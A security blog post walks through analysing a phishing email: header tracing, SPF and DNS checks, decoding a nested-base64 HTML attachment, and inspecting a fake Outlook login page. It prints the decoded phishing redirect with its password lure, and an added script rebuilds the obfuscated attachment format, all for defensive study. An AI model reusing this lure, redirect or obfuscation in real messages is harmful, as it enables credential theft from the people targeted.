Analysis of a phishing email

Laur Telliskivi
9 min read · Jul 20, 2020


As the whole world has become more used to working from home due to COVID-19, it is only natural that attackers focus more on reaching users through phishing campaigns. Recently I received a (not-so-sophisticated) phishing email at my work address, and in this blogpost I will present a quick way to analyse a phishing email without going too deep down the rabbit hole.

This was the phishing email that arrived in my mailbox:

As we can see, it claims to come from “<company name> Workplace Scanner”, which should already raise red flags. As I later learned, a lot of our partners got the same email, with only the company name changed to match the target. This most likely means the attack is part of a mass phishing campaign using a predefined template rather than a specifically targeted, carefully crafted email.

The email claims to come from the address “no-reply@s2.valueserver.jp”, but this is not to be trusted on its own, as the visible sender address can be spoofed. To determine the true source of the email we need to examine the raw email headers. In Gmail these are available through the three-dot menu (“Show original”) while the email is open:

Having opened the original message, you will see a lot of information in the headers, including the route the email took. We are interested in the “Received:” entries, which tell us where the email came from. Think of each “Received:” entry as one stop (a mail server) on the way from the origin to the destination. Every server that handles the message prepends its own “Received:” line to the top of the headers, so the oldest hop is at the bottom and the newest at the top. One caveat: a sender can put fake “Received:” lines into the message before sending it, so only the lines written by servers you trust (your own mail provider’s, in this case Google’s) and everything above them are reliable; anything below those could be forged. To trace the origin we therefore look at the lowest “Received:” entry written by a trusted server. In our case that is also the very first (bottom-most) entry, and it looks like this:

Received: from s2.valueserver.jp (s2.valueserver.jp. [157.7.184.17])
by mx.google.com with ESMTPS id a201si4298848pfa.273.2020.07.13.06.51.25
for <name@company.com>
(version=TLS1_2 cipher=ECDHE-ECDSA-AES128-GCM-SHA256 bits=128/128);
Mon, 13 Jul 2020 06:51:26 -0700 (PDT)

Each “Received:” line is written by the server that received the message, so this entry was added by Google’s mail server (mx.google.com) when it accepted the connection from 157.7.184.17, not by the sender. The hostname right after “from” is what the connecting server announced about itself; the part in parentheses is what Google found by reverse-resolving the connecting IP. The two agree here, so the message really did come from that host. Note also that the first hop is the hosting server itself rather than a mail provider with a separate client-submission hop, which suggests the message was generated by a script or web-based application running on that server.

Let’s break down the “Received:” entry. The “from” part of the entry tells us the source of the email as this was the first entry: s2.valueserver.jp (s2.valueserver.jp. [157.7.184.17]). From this we can extract the domain name (s2.valueserver.jp) and the server IP address (157.7.184.17).

The “by” part tells us which server received the message at this hop: mx.google.com, Google’s mail server and the first stop after the origin. Because this is our own provider’s server, the information in this line can be trusted. Had the lowest “Received:” line instead been written by a server we do not control, it could have been inserted by the attacker and should not be trusted.
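The header walk described above can be scripted. The following is an added example (not code from the original post): it parses the “Received:” chain of a raw message with Python’s standard email module, lists the hops oldest-first, and reports the origin as seen by the servers we trust. The lower “Received:” line in the constructed message is the one quoted above; the upper hop (mail.company.com, the 10.20.30.40 address) and the trusted-server set are assumptions made for the example.

```python
import email
import re

# Constructed raw message (added example, not the full header from the post).
# The lower Received: line is the one quoted in the post; the upper one is an
# assumed internal relay (hostname and IP made up) so there is a chain to walk.
RAW_MESSAGE = b"""Received: from mx.google.com ([10.20.30.40])
 by mail.company.com with ESMTPS id 1k5x3-0001AB-4C
 for <name@company.com>; Mon, 13 Jul 2020 06:51:27 -0700 (PDT)
Received: from s2.valueserver.jp (s2.valueserver.jp. [157.7.184.17])
 by mx.google.com with ESMTPS id a201si4298848pfa.273.2020.07.13.06.51.25
 for <name@company.com>
 (version=TLS1_2 cipher=ECDHE-ECDSA-AES128-GCM-SHA256 bits=128/128);
 Mon, 13 Jul 2020 06:51:26 -0700 (PDT)
From: "<company name> Workplace Scanner" <no-reply@s2.valueserver.jp>
To: name@company.com
Subject: Preview Print File

***Preview Print File***
"""

FROM_RE = re.compile(r'\bfrom\s+(?P<helo>\S+)(?:\s+\((?P<comment>[^)]*)\))?')
BY_RE = re.compile(r'\bby\s+(?P<by>\S+)')
IP_RE = re.compile(r'\[(?P<ip>[0-9a-fA-F.:]+)\]')


def parse_received(value):
    """Parse one Received: header value into its from-host, IP, by-host and date."""
    value = re.sub(r'\s+', ' ', value).strip()      # unfold continuation lines
    hop = {'from': None, 'ip': None, 'by': None, 'date': None, 'raw': value}
    m = FROM_RE.search(value)
    if m:
        hop['from'] = m.group('helo')               # name the connecting server announced
        comment = m.group('comment') or ''
        ip = IP_RE.search(comment) or IP_RE.search(value)
        hop['ip'] = ip.group('ip') if ip else None  # IP the receiving server actually saw
    m = BY_RE.search(value)
    if m:
        hop['by'] = m.group('by')                   # server that wrote this line
    if ';' in value:
        hop['date'] = value.rsplit(';', 1)[1].strip()
    return hop


def received_chain(raw_bytes):
    """Return hops oldest-first: the bottom Received: line is the origin side."""
    msg = email.message_from_bytes(raw_bytes)
    values = msg.get_all('Received') or []          # header order: newest first
    return [parse_received(v) for v in reversed(values)]


def trusted_origin(hops, trusted_receivers):
    """Walk newest-first and stop trusting at the first line not written by a
    server we control. Returns (from_host, ip) of the earliest trustworthy hop,
    i.e. where the mail entered our infrastructure. Lines below it may be forged."""
    origin = None
    for hop in reversed(hops):
        if hop['by'] not in trusted_receivers:
            break
        origin = (hop['from'], hop['ip'])
    return origin


if __name__ == '__main__':
    hops = received_chain(RAW_MESSAGE)
    for i, h in enumerate(hops):
        print(f"hop {i}: from {h['from']} [{h['ip']}] by {h['by']} at {h['date']}")
    print('origin as seen by trusted servers:',
          trusted_origin(hops, {'mx.google.com', 'mail.company.com'}))
```

If you only trust your own relay and not the provider in front of it, shrink the trusted set: the reported origin then moves up one hop, which is exactly the point of the exercise. Real headers vary a lot (comments, IPv6, missing parentheses), so treat the regexes as a starting point rather than a full RFC 5321 parser.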

Alternatively, rather than inspecting the headers by hand, you can paste the raw header into Google’s Messageheader tool (part of the Google Admin Toolbox), which lays out the “hops” the email took:

Using the information collected so far we can dig further. We can look up the location of the server and other metadata on ONYPHE by querying the server IP:

https://www.onyphe.io/search/?query=157.7.184.17

Result:

ONYPHE query result

The server is located in Japan. It is always worth running a dig query to get the DNS records for the domain:

% dig -t any s2.valueserver.jp @8.8.8.8

; <<>> DiG 9.10.6 <<>> -t any s2.valueserver.jp @8.8.8.8
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47094
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;s2.valueserver.jp. IN ANY
;; ANSWER SECTION:
s2.valueserver.jp. 299 IN A 157.7.184.17
s2.valueserver.jp. 3599 IN MX 10 s2.valueserver.jp.
s2.valueserver.jp. 1199 IN TXT "v=spf1 a:s2.valueserver.jp a:spf1_mxr.valueserver.jp a:spf2_mxr.valueserver.jp a:spf3_mxr.valueserver.jp ~all"

@8.8.8.8 : the name server to query; here Google’s public DNS.

-t any : ask for all record types. Note that many resolvers nowadays answer ANY queries with a minimal response or refuse them outright (RFC 8482), so if you get back little or nothing, query the record types you care about separately (A, MX, TXT, NS).

The TXT record is the domain’s SPF policy. It authorises the A addresses of s2.valueserver.jp and three spf*_mxr hosts to send mail for the domain, so a message from 157.7.184.17 with an envelope sender at s2.valueserver.jp passes SPF. That is worth keeping in mind: SPF only says the sending server is allowed to send for that domain; it says nothing about the “Workplace Scanner” display name the attacker chose.
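To make the SPF point concrete, here is an added example (not from the original post) that evaluates an SPF record offline against a constructed resolver table. The A record of s2.valueserver.jp and the SPF TXT record are taken from the dig output above; the addresses for the spf1_mxr/spf2_mxr/spf3_mxr hosts are assumed (192.0.2.x documentation addresses), as is everything else in the DNS table. It implements the ip4/ip6/a/mx/include/all mechanisms with their qualifiers, which is enough for this record, but it is not a complete RFC 7208 evaluator (no redirect=, exp=, macros or CIDR suffixes on a/mx).

```python
import ipaddress

# Constructed DNS answers (added example). The s2.valueserver.jp A and TXT records
# are from the dig output in the post; every other entry is assumed for the demo.
DNS = {
    ('s2.valueserver.jp', 'A'): ['157.7.184.17'],
    ('s2.valueserver.jp', 'MX'): ['s2.valueserver.jp'],
    ('s2.valueserver.jp', 'TXT'): [
        'v=spf1 a:s2.valueserver.jp a:spf1_mxr.valueserver.jp '
        'a:spf2_mxr.valueserver.jp a:spf3_mxr.valueserver.jp ~all'
    ],
    ('spf1_mxr.valueserver.jp', 'A'): ['192.0.2.10'],   # assumed
    ('spf2_mxr.valueserver.jp', 'A'): ['192.0.2.11'],   # assumed
    ('spf3_mxr.valueserver.jp', 'A'): ['192.0.2.12'],   # assumed
}

QUALIFIERS = {'+': 'pass', '-': 'fail', '~': 'softfail', '?': 'neutral'}


def resolve(name, rtype):
    """Stand-in for a DNS lookup; swap in dnspython or similar for live checks."""
    return DNS.get((name, rtype), [])


def _host_has_ip(name, addr):
    return any(ipaddress.ip_address(a) == addr for a in resolve(name, 'A'))


def check_spf(ip, domain, depth=0):
    """Evaluate the SPF record of `domain` for a message sent from `ip`.

    Returns one of pass / fail / softfail / neutral / none / permerror, using
    the subset of RFC 7208 mechanisms needed for records like the one above.
    """
    if depth > 10:                       # RFC 7208 caps DNS-querying terms at 10
        return 'permerror'
    records = [t for t in resolve(domain, 'TXT') if t.startswith('v=spf1')]
    if not records:
        return 'none'
    if len(records) > 1:
        return 'permerror'               # multiple SPF records are invalid
    addr = ipaddress.ip_address(ip)

    for term in records[0].split()[1:]:  # skip the 'v=spf1' version tag
        qualifier = '+'
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(':')
        name = name.lower()
        if name == 'all':
            matched = True
        elif name in ('ip4', 'ip6'):
            matched = addr in ipaddress.ip_network(arg, strict=False)
        elif name == 'a':
            matched = _host_has_ip(arg or domain, addr)
        elif name == 'mx':
            matched = any(_host_has_ip(mx, addr) for mx in resolve(arg or domain, 'MX'))
        elif name == 'include':
            matched = check_spf(ip, arg, depth + 1) == 'pass'
        else:
            continue                     # redirect=/exp= etc. are not handled here
        if matched:
            return QUALIFIERS[qualifier]
    return 'neutral'                     # no mechanism matched and no 'all' term


if __name__ == '__main__':
    for sender_ip in ('157.7.184.17', '192.0.2.11', '203.0.113.5'):
        print(sender_ip, '->', check_spf(sender_ip, 's2.valueserver.jp'))
```

The sending IP from the Received header passes because it is the A record of s2.valueserver.jp, which the record lists explicitly; an unrelated address only reaches ~all and gets softfail, which most receivers still deliver. A pass here authenticates the envelope domain and nothing else, so it cannot be used to clear the message.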

The dig results show an MX record pointing at the host itself, which indicates that it accepts inbound mail for the domain. We can confirm that an SMTP service is actually listening by probing port 25 with the netcat command-line utility:

% nc 157.7.184.17 25
220 s2.valueserver.jp ESMTP
HELO relay.valueserver.jp
250 s2.valueserver.jp

The 220 banner confirms an SMTP service; the HELO/250 exchange only shows that the server speaks SMTP, not that it will relay for anyone. It is also always worth checking whether the server IP is on a blacklist, i.e. a list of IP addresses or domains that are known sources of spam. We can use MxToolbox for this:

This IP is listed on 4 blacklists, so the host is known to have sent spam.

Using whois query we can find more information about the domain:

% whois valueserver.jp
...
Domain Information:
[Domain Name] VALUESERVER.JP
[Registrant (JP)] 株式会社デジロック
[Registrant] DigiRock,Inc.
[Name Server] ns1.value-domain.com
[Name Server] ns2.value-domain.com
[Name Server] ns3.value-domain.com
[Name Server] ns4.value-domain.com
[Name Server] ns5.value-domain.com
[Name Server] ns11.value-domain.com
[Name Server] ns12.value-domain.com
[Name Server] ns13.value-domain.com
[Signing Key]
[Registered Date] 2009/04/08
[Expiration Date] 2021/04/30
[Status] Active
[Last Update] 2020/06/12 00:41:40 (JST)
Contact Information (public contact):
[Name (JP)] Whois Privacy Protection Service by VALUE-DOMAIN
[Name] Whois Privacy Protection Service by VALUE-DOMAIN
[Email] whoisproxy@value-domain.com
[Web Page] https://www.value-domain.com/
[Postal Code] 530-0011
[Postal Address (JP)] 大阪府大阪市北区大深町3-1 グランフロント大阪 タワーB 23階
[Postal Address] 3-1 Ofuka-cho, Kita-ku, Osaka-shi, Osaka, Grand Front Osaka Tower B, 23F
[Phone] 06-7634-2727
[Fax] 06-6374-0121

From this we can conclude that the domain is registered through the Japanese registrar VALUE-DOMAIN, with DigiRock, Inc. as the registrant and name servers at value-domain.com; the public contact is the registrar’s Whois privacy service, so no real contact details are exposed.

Browsing to the website “valueserver.jp” we see that it is a web hosting provider in Japan:

The Attachment

Based on the information gathered so far we can say with confidence that this email did not originate from our organisation: it was sent from a shared web-hosting server in Japan whose IP has a reputation for sending spam. Now let’s check the actual content of the email. It claims to come from some sort of workplace scanner, contains the text “***Preview Print File***”, and has an attachment with a .htm extension, which is usually a file containing HTML code.

My first step is always to check the potentially malicious attachment against VirusTotal, an online service that analyses suspicious files and URLs for malware and shares them with the security community. If the attachment has been used in a large phishing campaign before, there is a good chance somebody has already uploaded it and it has been flagged as a known phish. (If the attachment might contain anything sensitive or target-specific, look up its SHA-256 hash first instead of uploading the file, since uploaded samples are shared with other VirusTotal users.) Uploading the file and running the scan, only one AV engine recognises it as a phish:

One detection is not the definitive verdict we were looking for, so we proceed with manual analysis.

For analysing potentially malicious attachments I strongly recommend doing it in a sandboxed environment such as a virtual machine, which gives you a safe place to open malicious files. The most popular options are VirtualBox (free) and VMware (paid). For this analysis I use a Kali Linux image in VirtualBox. Having downloaded the file and moved it to my Linux VM, I first take a look at its contents:

The file contains JavaScript. Let’s break it down:

<script></script> : tells the browser to interpret everything between these tags as JavaScript (the default script type since HTML5).

document.write() : writes HTML or JavaScript text into the document.

atob() : decodes a base64-encoded string.

Looking at this JavaScript we can see a base64-encoded payload that is decoded six times with nested atob() calls, and the result is written into the HTML document. For decoding the base64 we can use Python (the script below expects a file containing just the base64 string copied out of the attachment):

import sys
import base64

# Usage: ./decodeb64-6x.py encoded.txt
# encoded.txt holds only the base64 string copied out of the innermost atob() call.
filename = sys.argv[1]
with open(filename, 'rb') as f:
    content = f.read()

# The attachment nests atob() six times, so decode six times.
for i in range(6):
    content = base64.decodebytes(content)

print(content.decode('utf-8'))

Result:

# ./decodeb64-6x.py encoded.txt 
<meta http-equiv="refresh" content="1;url=http://erikteichmann.com/vm/?0@=?aHJAY29tcGFueS5jb20="><br><b><strong>
To view document instantly,via your media file reader please login with your correct Password for verification as Microsoft has secured file with your email password.

The content is valid HTML. If processed in a browser, the meta refresh will navigate after one second to the URL “http://erikteichmann.com/vm/?0@=?aHJAY29tcGFueS5jb20=”. Note the base64-looking query parameter: aHJAY29tcGFueS5jb20= decodes to hr@company.com, i.e. the target’s email address is handed to the landing page, most likely so the fake login form can be pre-filled with it.
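Hard-coding “six” works for this sample but not the next one, so here is an added example (not code from the original post) that automates the attachment analysis end to end: it finds the document.write(atob(...atob("..."))) chain, counts the atob() layers, decodes that many times, pulls the URL out of the meta refresh, and decodes any base64-looking fragments in it. Because the attachment’s bytes are not on the page, the sample .htm is constructed at run time by wrapping the decoded HTML shown above in six layers of base64; the assumption is that the real file has the same document.write(atob(...)) shape with a single string literal.

```python
import base64
import html
import re

# The decoded HTML from the post: the meta refresh plus the lure text.
FINAL_HTML = (
    '<meta http-equiv="refresh" content="1;url=http://erikteichmann.com/vm/'
    '?0@=?aHJAY29tcGFueS5jb20="><br><b><strong>\n'
    'To view document instantly,via your media file reader please login with '
    'your correct Password for verification as Microsoft has secured file with '
    'your email password.'
)


def build_sample_attachment(inner_html, depth=6):
    """Constructed stand-in for the .htm attachment (the real bytes are not on the
    page): `inner_html` wrapped in `depth` layers of base64 and a matching chain of
    atob() calls inside document.write(), mirroring the structure the post describes."""
    payload = inner_html.encode()
    for _ in range(depth):
        payload = base64.b64encode(payload)
    call = '"%s"' % payload.decode()
    for _ in range(depth):
        call = 'atob(%s)' % call
    return '<script>document.write(%s)</script>' % call


# document.write( atob( atob( ... "BASE64" ... ) ) )
SCRIPT_RE = re.compile(
    r'document\.write\((?P<chain>(?:atob\()+)(?P<quote>["\'])'
    r'(?P<b64>[A-Za-z0-9+/=]+)(?P=quote)\)+'
)
REFRESH_RE = re.compile(
    r'<meta[^>]+http-equiv=["\']refresh["\'][^>]+content=["\']\s*\d+\s*;\s*url=(?P<url>[^"\']+)',
    re.I,
)
B64_RE = re.compile(r'[A-Za-z0-9+/]{8,}={0,2}')


def unwrap_atob(htm_source):
    """Locate the atob() chain, count its layers and decode that many times.
    Returns (decoded_html, depth) so the depth is measured, not assumed."""
    m = SCRIPT_RE.search(htm_source)
    if not m:
        raise ValueError('no document.write(atob(...)) chain found')
    depth = m.group('chain').count('atob(')
    data = m.group('b64').encode()
    for _ in range(depth):
        data = base64.b64decode(data)
    return data.decode('utf-8', errors='replace'), depth


def extract_refresh_url(decoded_html):
    """Return the target of a <meta http-equiv="refresh"> redirect, or None."""
    m = REFRESH_RE.search(decoded_html)
    return html.unescape(m.group('url')) if m else None


def decode_b64_tokens(url):
    """Return (token, decoded_text) pairs for base64 fragments in the URL that decode
    to printable text; phishing kits often pass the victim's address this way."""
    found = []
    for tok in B64_RE.findall(url):
        try:
            text = base64.b64decode(tok, validate=True).decode('utf-8')
        except (ValueError, UnicodeDecodeError):
            continue                     # not base64, or not text: ignore
        if text.isprintable():
            found.append((tok, text))
    return found


if __name__ == '__main__':
    sample = build_sample_attachment(FINAL_HTML)
    decoded, depth = unwrap_atob(sample)
    url = extract_refresh_url(decoded)
    print(f'atob() layers: {depth}')
    print(f'redirect target: {url}')
    for tok, text in decode_b64_tokens(url):
        print(f'base64 parameter {tok} -> {text}')
```

For a real attachment, read the file and pass its contents to unwrap_atob() instead of the constructed sample. If the kit builds the string from concatenated pieces or a variable rather than one literal, the regex will not match and you fall back to copying the string out by hand as in the script above.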

For checking suspicious links quickly I have recently used urlscan.io, which fetches the URL on our behalf and analyses it. Submitting the URL to urlscan we get:

urlscan.io output

As we can see from the results, the submitted URL redirects to “https://notanegramusic.com/Secure/”, and urlscan rates it as potentially malicious. urlscan also takes a screenshot of the landing page, and we can see it is a fake Outlook login page. We also get other useful information, such as when the domain was registered and whether it is on the Google Safe Browsing blacklist.

Interestingly, if we browse to “https://notanegramusic.com/” we find some sort of music production site:

It might be a dummy page set up by the attacker to lend the domain legitimacy while it harvests credentials. The other option is that the site is real but has been compromised and is now being used by the attackers to harvest credentials.

Summary

Finally, having done this analysis, we can conclude that the purpose of the phishing email is to harvest Outlook account credentials. The emails were sent from a shared hosting server in Japan whose IP is known for sending spam; that tells us where the mail relay is, not necessarily where the attacker sits, and the credential-harvesting page lives on a different domain altogether.

Although knowing where the phish came from and what it wants is useful, I would say that even more important is how security personnel react to every phishing email. Here are some suggestions:

  • When you get a phishing email, or you know anyone else in the company got it, check who else received it and let them all know it was a phish. If it turns out to be a mass phishing attack against the company, it is strongly recommended to warn all employees.
  • If anyone entered their credentials on the phishing page, they need to change their password immediately, and change it anywhere else they reused it. Active sessions and app tokens for the account should be revoked as well, since a password change alone does not always log out an attacker who has already signed in.
  • Monitor login attempts to the affected accounts more carefully for a while and look for suspicious activity, such as logins from unusual locations or newly created mailbox forwarding rules.
  • Encourage everyone in the company to report phishing. This is key in detecting and reacting to a phishing attack quickly. This article talks about ways of improving the response rate to phishing emails.

On a side note, I think a lot of this analysis is possible to automate. This might be something I will put to my TODO list soon. If anyone knows a good tool that does a good analysis given a raw email as input, please let me know in the comments!


Laur Telliskivi

Former requirements engineer and a musician. Currently Senior Security Engineer at Axel Springer. Follow me on Twitter: @tell1skivi